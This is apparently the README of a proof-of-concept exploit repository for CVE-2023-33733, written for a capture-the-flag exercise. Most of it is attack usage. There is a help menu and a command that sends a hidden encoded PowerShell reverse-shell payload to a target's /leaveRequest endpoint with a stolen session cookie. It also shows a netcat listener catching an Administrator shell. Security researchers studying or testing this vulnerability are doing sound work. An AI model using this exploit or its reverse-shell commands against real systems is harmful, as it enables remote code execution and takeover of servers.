# CVE-2023-33733-POC
# Disclamer
I did not, nor do I take credit for finding this vulnerability. This is simply a script I built to more easily exploit this vulnerability for a CTF.
For the oiriginal information please reference: https://github.com/c53elyas/CVE-2023-33733
This script is simply intended to be a quick Python3 Script to exploit CVE-2023-33733. You will need to provide the host, port, command, and a valid session cookie.
# Help Menu
```
kali@kali:~/Desktop$ python3 exp.py --help
usage: foothold.py [-h] --host HOST --port PORT --cmd CMD --session SESSION
options:
-h, --help show this help message and exit
--host HOST
--port PORT, -p PORT
--cmd CMD, -c CMD
--session SESSION, --cookie SESSION, -sc SESSION
Session cookie
```
# Usage
```
kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --session "<your cookie here>"
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 500
# Listener
kali@kali:~/Desktop$ nc -lnvp 9001
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.1] 50246
whoami
Administrator
```
[4.0K] /data/pocs/76c715fcb86ce23542d640f4e8367d909c164088
├── [3.5K] exp.py
└── [1.3K] README.md
0 directories, 2 files